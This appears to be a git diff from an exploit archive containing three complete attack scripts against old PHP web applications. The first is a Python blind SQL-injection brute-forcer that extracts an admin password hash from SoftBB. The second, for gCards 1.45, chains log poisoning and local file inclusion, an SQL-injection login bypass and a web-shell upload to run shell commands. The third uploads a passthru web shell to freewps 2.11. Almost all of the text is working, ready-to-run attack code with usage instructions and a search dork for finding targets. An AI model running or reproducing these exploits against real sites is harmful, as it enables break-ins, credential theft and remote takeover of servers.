+# The field 'mail' in reg.php is used directly in a SQL query :
+# $sql = 'SELECT pseudo,mail FROM '.$prefixtable.'membres WHERE pseudo = "'.add_gpc($pseudoreg).'" OR mail = "'.$mail.'"';
+# We can deduce deduce the result of some sql querys according to the error messages returned
+# The exploit test the characters of the md5 hash one by one using a special query
+import httplib, urllib
+
+# Change the following values...
+admin="admin"
+server="localhost"
+path="/forum"
+#
+hash=""
+chars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0')
+
+print "LOTFREE TEAM SoftBB BruteForcing tool"
+print "-------------------------------------"
+for i in range(1,33):
+  print "Brute forcing hash["+str(i)+"]"
+  for a in chars:
+    params=urllib.urlencode({'pseudo':admin,
+    'mdp':'1',
+    'mdpc':'1',
+    'mail':'" union select pseudo,1 from softbb_membres where pseudo="'+admin+'" and substr(mdp,'+str(i)+',1)="'+a+'" limit 1,1#',
+    'condok':'true'})
+    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
+    conn = httplib.HTTPConnection(server)
+    conn.request("POST", path+"/index.php?page=reg", params, headers)
+    response = conn.getresponse()
+    data = response.read()
+    conn.close()
+    if data.find("Ce pseudonyme est d")>0:
+      hash=hash+a
+      continue
+
+print
+if len(hash)==32:
+  print "Found hash =",hash,"for account",admin
+  print "You can use http://md5.rednoize.com/ to crack the md5 hash"
+else:
+  print "Exploit failed... verify the path to the forum or try changing the limit 1,1 in the sql request..." 
+
+# milw0rm.com [2006-03-19]
diff --git a/platforms/php/webapps/1595.php b/platforms/php/webapps/1595.php
index d4c4af7b6..cfc1a4ac8 100755
--- a/platforms/php/webapps/1595.php
+++ b/platforms/php/webapps/1595.php
@@ -1,362 +1,362 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "gCards <= 1.45 multiple vulnerabilities\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-echo "Sun-Tzu:\"At first, then, exhibit the coyness of a maiden, until the\r\n";
-echo "enemy gives you an opening; afterwards emulate the rapidity of a\r\n";
-echo "running hare, and it will be too late for the enemy to oppose you.\"\r\n";
-
-echo "dork: \"powered by gcards\"\r\n\r\n";
-
-/*
-
-explaination:
-software site: http://www.gregphoto.net/gcards/index.php
-
-i) vulnerable code in inc/setLang.php:
-
-<?
-	if ($page->languageredirect == $_SERVER['PHP_SELF']) {
-		if (isset($_GET['setLang'])) $_SESSION['setLang'] = $_GET['setLang'];
-	}
-
-	$langFile = $page->relpath.'inc/lang/'.$lang[$_SESSION['setLang']]['file'];
-
-	if (file_exists($langFile)) {
-		include_once($langFile);
-	}
-	else {
-		echo "Could not find language file $langFile";
-	}
-?>
-
-this code is included by main script, so ... arbitrary local inclusion, poc:
-
-http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=../../../../../../../../../../../var/log/httpd/access_log
-
-this works regardless of any magic_quotes_gpc settings, apart open_basedir
-restrictions obviously
-
-ii) also we have SQL injection in admin authentication procedure, admin/loginfunction.php
-at lines 28-38:
-
-...
-	$username = $_POST['username'];
-	$userpass = $_POST['userpass'];
-	if ($username && $userpass)
-	{
-		include('../inc/adodb/adodb.inc.php');	   # load code common to ADOdb
-		include('../config.php');
-		$ADODB_FETCH_MODE = ADODB_FETCH_ASSOC;
-		$conn = &ADONewConnection('mysql');	# create a connection
-		$conn->Connect($dbhost,$dbuser,$dbpass,$dbdatabase);
-		$pass = md5($userpass);
-		$sqlstmt = "SELECT role FROM ".$tablePrefix."cardusers WHERE username='$username' AND userpass='$pass'";
-...
-
-login as admin typing:
-
-username: 'or'suntzu'='suntzu'/*
-password: [whatever]
-
-this works with magic_quotes_gpc=Off
-
-once you are admin, you can upload php files, files are renamed but gcards keep
-php extension, so you can launch commands from them
-
-iii)xss:
-
-http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
-
-this exploit does the dirty work for i) and ii)
-
-                                                                              */
-if ($argc<5) {
-echo "Usage: php ".$argv[0]." host path action cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to gcards\r\n";
-echo "action:    1 - launch commands through arbitrary local inclusion\r\n";
-echo "               (no php.ini restriction)\r\n";
-echo "           2 - launch commands through sql injection/admin auth bypass\r\n";
-echo "               (works with magic_quotes_gpc = Off\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /gcards/ 2 cat ./../config.php\r\n";
-echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php\r\n";
-echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php -p81\r\n";
-echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php -P1.1.1.1:80\r\n";
-die;
-}
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$action=$argv[3];
-$cmd="";$port=80;$proxy="";
-
-for ($i=4; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "action selected -> ".$action."\r\n";
-if ($action=="1")
-{
-  echo "[1] Injecting some code in log files...\r\n";
-  $CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}';
-  $CODE.='passthru($_GET[cmd]);echo 666;die;?>';
-  $packet.="GET ".$p.$CODE." HTTP/1.1\r\n";
-  $packet.="User-Agent: ".$CODE."\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Connection: close\r\n\r\n";
-  #debug
-  #echo quick_dump($packet);
-  sendpacketii($packet);
-
-  # fill with possible locations
-  $paths= array (
-  "../../../../../../../../../../var/log/httpd/access_log",
-  "../../../../../../../../../../var/log/httpd/error_log",
-  "../apache/logs/error.log",
-  "../apache/logs/access.log",
-  "../../apache/logs/error.log",
-  "../../apache/logs/access.log",
-  "../../../apache/logs/error.log",
-  "../../../apache/logs/access.log",
-  "../../../../apache/logs/error.log",
-  "../../../../apache/logs/access.log",
-  "../../../../../../../../../../etc/httpd/logs/acces_log",
-  "../../../../../../../../../../etc/httpd/logs/acces.log",
-  "../../../../../../../../../../etc/httpd/logs/error_log",
-  "../../../../../../../../../../etc/httpd/logs/error.log",
-  "../../../../../../../../../../var/www/logs/access_log",
-  "../../../../../../../../../../var/www/logs/access.log",
-  "../../../../../../../../../../usr/local/apache/logs/access_log",
-  "../../../../../../../../../../usr/local/apache/logs/access.log",
-  "../../../../../../../../../../var/log/apache/access_log",
-  "../../../../../../../../../../var/log/apache/access.log",
-  "../../../../../../../../../../var/log/access_log",
-  "../../../../../../../../../../var/www/logs/error_log",
-  "../../../../../../../../../../var/www/logs/error.log",
-  "../../../../../../../../../../usr/local/apache/logs/error_log",
-  "../../../../../../../../../../usr/local/apache/logs/error.log",
-  "../../../../../../../../../../var/log/apache/error_log",
-  "../../../../../../../../../../var/log/apache/error.log",
-  "../../../../../../../../../../var/log/access_log",
-  "../../../../../../../../../../var/log/error_log"
-  );
-
-  for ($i=0; $i<=count($paths)-1; $i++)
-  {
-    $j=$i+2;
-    echo "[".$j."] Trying with ".$paths[$i]."\r\n";
-    $xpl=urlencode($paths[$i]);
-    $packet ="GET ".$p."index.php?cmd=".$cmd."&setLang=suntzu&lang[suntzu][file]=".$xpl." HTTP/1.0\r\n";
-    $packet.="Host: ".$host."\r\n";
-    $packet.="Connection: Close\r\n\r\n";
-    #debug, shows packets in a nice format
-    #echo quick_dump($packet);
-    sendpacketii($packet);
-
-    if (strstr($html,"666")){
-      echo "Exploit succeeded...\r\n";
-      $temp=explode("666",$html);
-      echo $temp[1];
-      die;
-    }
-  }
-
-}
-else
-if ($action=="2")
-{   echo "[1] Injecting some SQL statements in admin login username field...\r\n";
-    $sql=urlencode("'or'suntzu'='suntzu'/*");
-    $data="username=".$sql;
-    $data.="&userpass=suntzu";
-    $packet ="POST ".$p."admin/admin.php HTTP/1.1\r\n";
-    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-    $packet.="Host: ".$host."\r\n";
-    $packet.="Content-Length: ".strlen($data)."\r\n";
-    $packet.="Connection: Close\r\n\r\n";
-    $packet.=$data;
-    #echo quick_dump($packet);
-    sendpacketii($packet);
-    if (strstr($html,"gCards Administration Console"))
-    {echo "Sql injection succeeded...\r\n";}
-    else
-    {die("Not succeeded, maybe we have magic_quotes_gpc on here...\r\n");}
-    $temp=explode("Set-Cookie: ",$html);
-    $temp2=explode(" ",$temp[1]);
-    $cookie=$temp2[0];
-    echo "Cookie -> ".$cookie."\r\n";
-    echo "[2] Let's retrieve a category name to upload a file in ...\r\n";
-    $packet ="GET ".$p."admin/cards.php HTTP/1.1\r\n";
-    $packet.="Host: ".$host."\r\n";
-    $packet.="Cookie: ".$cookie."\r\n";
-    $packet.="Connection: Close\r\n\r\n";
-    #echo quick_dump($packet);
-    sendpacketii($packet);
-    $temp=explode("<option value=\"",$html);
-    $temp2=explode("\"",$temp[1]);
-    $catid=$temp2[0];
-    echo "catid -> ".$catid."\r\n";
-    if ($catid=="") {$catid=1;}
-    echo "[3] Uploading a php file...\r\n";
-$data='-----------------------------7d613b1d0448
-Content-Disposition: form-data; name="MAX_FILE_SIZE"
-
-250000
------------------------------7d613b1d0448
-Content-Disposition: form-data; name="cardname"
-
-suntzu
------------------------------7d613b1d0448
-Content-Disposition: form-data; name="catid"
-
-'.$catid.'
------------------------------7d613b1d0448
-Content-Disposition: form-data; name="userfile"; filename="suntzu.php"
-Content-Type: application/octet-stream
-
-<?php echo 666;ini_set("max_execution_time",0);passthru($_GET[cmd]);echo 666;?>
------------------------------7d613b1d0448
-Content-Disposition: form-data; name="userthumb"; filename="suntzu.php"
-Content-Type: application/octet-stream
-
-<?php echo 666;ini_set("max_execution_time",0);passthru($_GET[cmd]);echo 666;?>
------------------------------7d613b1d0448
-Content-Disposition: form-data; name="submit"
-
-Upload
------------------------------7d613b1d0448
-';
-    $packet ="POST ".$p."admin/upload.php HTTP/1.1\r\n";
-    $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d613b1d0448\r\n";
-    $packet.="Host: ".$host."\r\n";
-    $packet.="Content-Length: ".strlen($data)."\r\n";
-    $packet.="Connection: Close\r\n";
-    $packet.="Cookie: ".$cookie."\r\n\r\n";
-    $packet.=$data;
-    #echo quick_dump($packet);
-    sendpacketii($packet);
-    if (strstr($html,"successfully"))
-    {echo "Succeeded...\r\n";}
-    else
-    {die("For some reason...Not succeeded\r\n");}
-    echo "[4] Let's retrieve the new filename ...\r\n";
-    $packet ="GET ".$p."admin/cards.php HTTP/1.1\r\n";
-    $packet.="Host: ".$host."\r\n";
-    $packet.="Cookie: ".$cookie."\r\n";
-    $packet.="Connection: Close\r\n\r\n";
-    #echo quick_dump($packet);
-    sendpacketii($packet);
-    $temp=explode("suntzu.php",$html);
-    $temp2=explode("<td>",$temp[count($temp)-2]);
-    $temp=$temp2[count($temp2)-1];
-    $newfile=$temp."suntzu.php";
-    if ($newfile=="") {die("For some reason, exploit failed...");}
-    echo "File renamed to: ".$newfile."\r\n";
-    echo "[5] Launch commands ...\r\n";
-    $packet ="GET ".$p."images/".$newfile."?cmd=".$cmd." HTTP/1.1\r\n";
-    $packet.="Host: ".$host."\r\n";
-    $packet.="Connection: Close\r\n\r\n";
-    #echo quick_dump($packet);
-    sendpacketii($packet);
-    if (strstr($html,"666"))
-     {
-       echo "Exploit succeeded...\r\n";
-       $temp=explode("666",$html);
-       echo $temp[1];
-       die;
-     }
-}
-else
-{die ("Wrong action...\r\n");}
-//if you are here...
-echo "Exploit failed...\r\n";
-?>
-
-# milw0rm.com [2006-03-20]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "gCards <= 1.45 multiple vulnerabilities\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+echo "Sun-Tzu:\"At first, then, exhibit the coyness of a maiden, until the\r\n";
+echo "enemy gives you an opening; afterwards emulate the rapidity of a\r\n";
+echo "running hare, and it will be too late for the enemy to oppose you.\"\r\n";
+
+echo "dork: \"powered by gcards\"\r\n\r\n";
+
+/*
+
+explaination:
+software site: http://www.gregphoto.net/gcards/index.php
+
+i) vulnerable code in inc/setLang.php:
+
+<?
+	if ($page->languageredirect == $_SERVER['PHP_SELF']) {
+		if (isset($_GET['setLang'])) $_SESSION['setLang'] = $_GET['setLang'];
+	}
+
+	$langFile = $page->relpath.'inc/lang/'.$lang[$_SESSION['setLang']]['file'];
+
+	if (file_exists($langFile)) {
+		include_once($langFile);
+	}
+	else {
+		echo "Could not find language file $langFile";
+	}
+?>
+
+this code is included by main script, so ... arbitrary local inclusion, poc:
+
+http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=../../../../../../../../../../../var/log/httpd/access_log
+
+this works regardless of any magic_quotes_gpc settings, apart open_basedir
+restrictions obviously
+
+ii) also we have SQL injection in admin authentication procedure, admin/loginfunction.php
+at lines 28-38:
+
+...
+	$username = $_POST['username'];
+	$userpass = $_POST['userpass'];
+	if ($username && $userpass)
+	{
+		include('../inc/adodb/adodb.inc.php');	   # load code common to ADOdb
+		include('../config.php');
+		$ADODB_FETCH_MODE = ADODB_FETCH_ASSOC;
+		$conn = &ADONewConnection('mysql');	# create a connection
+		$conn->Connect($dbhost,$dbuser,$dbpass,$dbdatabase);
+		$pass = md5($userpass);
+		$sqlstmt = "SELECT role FROM ".$tablePrefix."cardusers WHERE username='$username' AND userpass='$pass'";
+...
+
+login as admin typing:
+
+username: 'or'suntzu'='suntzu'/*
+password: [whatever]
+
+this works with magic_quotes_gpc=Off
+
+once you are admin, you can upload php files, files are renamed but gcards keep
+php extension, so you can launch commands from them
+
+iii)xss:
+
+http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+this exploit does the dirty work for i) and ii)
+
+                                                                              */
+if ($argc<5) {
+echo "Usage: php ".$argv[0]." host path action cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to gcards\r\n";
+echo "action:    1 - launch commands through arbitrary local inclusion\r\n";
+echo "               (no php.ini restriction)\r\n";
+echo "           2 - launch commands through sql injection/admin auth bypass\r\n";
+echo "               (works with magic_quotes_gpc = Off\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /gcards/ 2 cat ./../config.php\r\n";
+echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php\r\n";
+echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php -p81\r\n";
+echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php -P1.1.1.1:80\r\n";
+die;
+}
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$action=$argv[3];
+$cmd="";$port=80;$proxy="";
+
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "action selected -> ".$action."\r\n";
+if ($action=="1")
+{
+  echo "[1] Injecting some code in log files...\r\n";
+  $CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}';
+  $CODE.='passthru($_GET[cmd]);echo 666;die;?>';
+  $packet.="GET ".$p.$CODE." HTTP/1.1\r\n";
+  $packet.="User-Agent: ".$CODE."\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Connection: close\r\n\r\n";
+  #debug
+  #echo quick_dump($packet);
+  sendpacketii($packet);
+
+  # fill with possible locations
+  $paths= array (
+  "../../../../../../../../../../var/log/httpd/access_log",
+  "../../../../../../../../../../var/log/httpd/error_log",
+  "../apache/logs/error.log",
+  "../apache/logs/access.log",
+  "../../apache/logs/error.log",
+  "../../apache/logs/access.log",
+  "../../../apache/logs/error.log",
+  "../../../apache/logs/access.log",
+  "../../../../apache/logs/error.log",
+  "../../../../apache/logs/access.log",
+  "../../../../../../../../../../etc/httpd/logs/acces_log",
+  "../../../../../../../../../../etc/httpd/logs/acces.log",
+  "../../../../../../../../../../etc/httpd/logs/error_log",
+  "../../../../../../../../../../etc/httpd/logs/error.log",
+  "../../../../../../../../../../var/www/logs/access_log",
+  "../../../../../../../../../../var/www/logs/access.log",
+  "../../../../../../../../../../usr/local/apache/logs/access_log",
+  "../../../../../../../../../../usr/local/apache/logs/access.log",
+  "../../../../../../../../../../var/log/apache/access_log",
+  "../../../../../../../../../../var/log/apache/access.log",
+  "../../../../../../../../../../var/log/access_log",
+  "../../../../../../../../../../var/www/logs/error_log",
+  "../../../../../../../../../../var/www/logs/error.log",
+  "../../../../../../../../../../usr/local/apache/logs/error_log",
+  "../../../../../../../../../../usr/local/apache/logs/error.log",
+  "../../../../../../../../../../var/log/apache/error_log",
+  "../../../../../../../../../../var/log/apache/error.log",
+  "../../../../../../../../../../var/log/access_log",
+  "../../../../../../../../../../var/log/error_log"
+  );
+
+  for ($i=0; $i<=count($paths)-1; $i++)
+  {
+    $j=$i+2;
+    echo "[".$j."] Trying with ".$paths[$i]."\r\n";
+    $xpl=urlencode($paths[$i]);
+    $packet ="GET ".$p."index.php?cmd=".$cmd."&setLang=suntzu&lang[suntzu][file]=".$xpl." HTTP/1.0\r\n";
+    $packet.="Host: ".$host."\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    #debug, shows packets in a nice format
+    #echo quick_dump($packet);
+    sendpacketii($packet);
+
+    if (strstr($html,"666")){
+      echo "Exploit succeeded...\r\n";
+      $temp=explode("666",$html);
+      echo $temp[1];
+      die;
+    }
+  }
+
+}
+else
+if ($action=="2")
+{   echo "[1] Injecting some SQL statements in admin login username field...\r\n";
+    $sql=urlencode("'or'suntzu'='suntzu'/*");
+    $data="username=".$sql;
+    $data.="&userpass=suntzu";
+    $packet ="POST ".$p."admin/admin.php HTTP/1.1\r\n";
+    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+    $packet.="Host: ".$host."\r\n";
+    $packet.="Content-Length: ".strlen($data)."\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    $packet.=$data;
+    #echo quick_dump($packet);
+    sendpacketii($packet);
+    if (strstr($html,"gCards Administration Console"))
+    {echo "Sql injection succeeded...\r\n";}
+    else
+    {die("Not succeeded, maybe we have magic_quotes_gpc on here...\r\n");}
+    $temp=explode("Set-Cookie: ",$html);
+    $temp2=explode(" ",$temp[1]);
+    $cookie=$temp2[0];
+    echo "Cookie -> ".$cookie."\r\n";
+    echo "[2] Let's retrieve a category name to upload a file in ...\r\n";
+    $packet ="GET ".$p."admin/cards.php HTTP/1.1\r\n";
+    $packet.="Host: ".$host."\r\n";
+    $packet.="Cookie: ".$cookie."\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    #echo quick_dump($packet);
+    sendpacketii($packet);
+    $temp=explode("<option value=\"",$html);
+    $temp2=explode("\"",$temp[1]);
+    $catid=$temp2[0];
+    echo "catid -> ".$catid."\r\n";
+    if ($catid=="") {$catid=1;}
+    echo "[3] Uploading a php file...\r\n";
+$data='-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+250000
+-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="cardname"
+
+suntzu
+-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="catid"
+
+'.$catid.'
+-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="userfile"; filename="suntzu.php"
+Content-Type: application/octet-stream
+
+<?php echo 666;ini_set("max_execution_time",0);passthru($_GET[cmd]);echo 666;?>
+-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="userthumb"; filename="suntzu.php"
+Content-Type: application/octet-stream
+
+<?php echo 666;ini_set("max_execution_time",0);passthru($_GET[cmd]);echo 666;?>
+-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="submit"
+
+Upload
+-----------------------------7d613b1d0448
+';
+    $packet ="POST ".$p."admin/upload.php HTTP/1.1\r\n";
+    $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d613b1d0448\r\n";
+    $packet.="Host: ".$host."\r\n";
+    $packet.="Content-Length: ".strlen($data)."\r\n";
+    $packet.="Connection: Close\r\n";
+    $packet.="Cookie: ".$cookie."\r\n\r\n";
+    $packet.=$data;
+    #echo quick_dump($packet);
+    sendpacketii($packet);
+    if (strstr($html,"successfully"))
+    {echo "Succeeded...\r\n";}
+    else
+    {die("For some reason...Not succeeded\r\n");}
+    echo "[4] Let's retrieve the new filename ...\r\n";
+    $packet ="GET ".$p."admin/cards.php HTTP/1.1\r\n";
+    $packet.="Host: ".$host."\r\n";
+    $packet.="Cookie: ".$cookie."\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    #echo quick_dump($packet);
+    sendpacketii($packet);
+    $temp=explode("suntzu.php",$html);
+    $temp2=explode("<td>",$temp[count($temp)-2]);
+    $temp=$temp2[count($temp2)-1];
+    $newfile=$temp."suntzu.php";
+    if ($newfile=="") {die("For some reason, exploit failed...");}
+    echo "File renamed to: ".$newfile."\r\n";
+    echo "[5] Launch commands ...\r\n";
+    $packet ="GET ".$p."images/".$newfile."?cmd=".$cmd." HTTP/1.1\r\n";
+    $packet.="Host: ".$host."\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    #echo quick_dump($packet);
+    sendpacketii($packet);
+    if (strstr($html,"666"))
+     {
+       echo "Exploit succeeded...\r\n";
+       $temp=explode("666",$html);
+       echo $temp[1];
+       die;
+     }
+}
+else
+{die ("Wrong action...\r\n");}
+//if you are here...
+echo "Exploit failed...\r\n";
+?>
+
+# milw0rm.com [2006-03-20]
diff --git a/platforms/php/webapps/1600.php b/platforms/php/webapps/1600.php
index 0311ce481..74e640372 100755
--- a/platforms/php/webapps/1600.php
+++ b/platforms/php/webapps/1600.php
@@ -1,83 +1,83 @@
-<?
-error_reporting(E_ERROR);
-
-function exploit_init()
-{
-    if (!extension_loaded('php_curl') && !extension_loaded('curl'))
-    {
-       if (!dl('curl.so') && !dl('php_curl.dll'))
-       die ("oo error - cannot load curl extension!");
-    }
-}
-
-function exploit_header()
-{
-    echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo";
-    echo "                                  oo    ooooooo     ooooooo\n";
-    echo "                    oooo   oooo o888  o88     888 o888   888o\n";
-    echo "                      888o888    888        o888   888888888\n";
-    echo "                      o88888o    888     o888   o 888o   o888\n";
-    echo "                    o88o   o88o o888o o8888oooo88   88ooo88\n";
-    echo "ooooooooooooooooooooooooooooo freewps 2.11 exploit ooooooooooooooooooooooooooooo\n";
-    echo "oo usage          $ php freewps-211-exploit.php [url] [cmd]\n";
-    echo "oo proxy support  $ php freewps-211-exploit.php [url] [cmd] [proxy]:[port]\n";
-    echo "oo example        $ php freewps-211-exploit.php http://localhost 'ls -a'\n";
-    echo "oo execute a command on the remote system by uploading a shell\n\n";
-    echo "oo command : " . $_SERVER['argv'][2] . "\n\n";
-}
-
-function exploit_bottom()
-{
-    echo "\noo greets   : b0xC - i want to wish you a happy 21st birthday! this is my small\n";
-    echo "              present for you. :)\n";
-    echo "oo discover : x128 - alexander wilhelm - 21/03/2006\n";
-    echo "oo contact  : exploit <at> x128.net                    oo website : www.x128.net\n";
-}
-
-function exploit_execute()
-{
-    $connection = curl_init();
-
-    if ($_SERVER['argv'][3])
-    {
-        curl_setopt($connection, CURLOPT_TIMEOUT, 8);
-        curl_setopt($connection, CURLOPT_PROXY, $_SERVER['argv'][3]);
-    }
-    curl_setopt ($connection, CURLOPT_USERAGENT, 'x128');
-    curl_setopt ($connection, CURLOPT_RETURNTRANSFER, 1);
-    curl_setopt ($connection, CURLOPT_HEADER, 0);
-
-    curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/upload/shell.php");
-    $source = curl_exec($connection);
-
-    if(strpos($source, "404"))
-    {
-       $shell = fopen("shell.php", "w");
-       fwrite($shell, "<? ini_set(max_execution_time,0); passthru(\$HTTP_GET_VARS[shell]); ?>");
-       fclose($shell);
-
-       curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/htmlarea/popups/ImageManager/images.php");
-       curl_setopt ($connection, CURLOPT_POST, 1);
-       curl_setopt ($connection, CURLOPT_POSTFIELDS, array("upload" => "@shell.php", "dirPath"=> "/upload"));
-       curl_exec($connection) or die("oo error - cannot connect!\n");
-
-       sleep(2);
-       unlink("shell.php");
-    }
-    curl_setopt ($connection, CURLOPT_POST, 0);
-    curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/upload/shell.php?shell=" . urlencode($_SERVER['argv'][2]));
-
-    $source = curl_exec($connection) or die("oo error - cannot connect!\n");
-
-    echo $source;
-
-    curl_close ($connection);
-}
-
-exploit_init();
-exploit_header();
-exploit_execute();
-exploit_bottom();
-?>
-
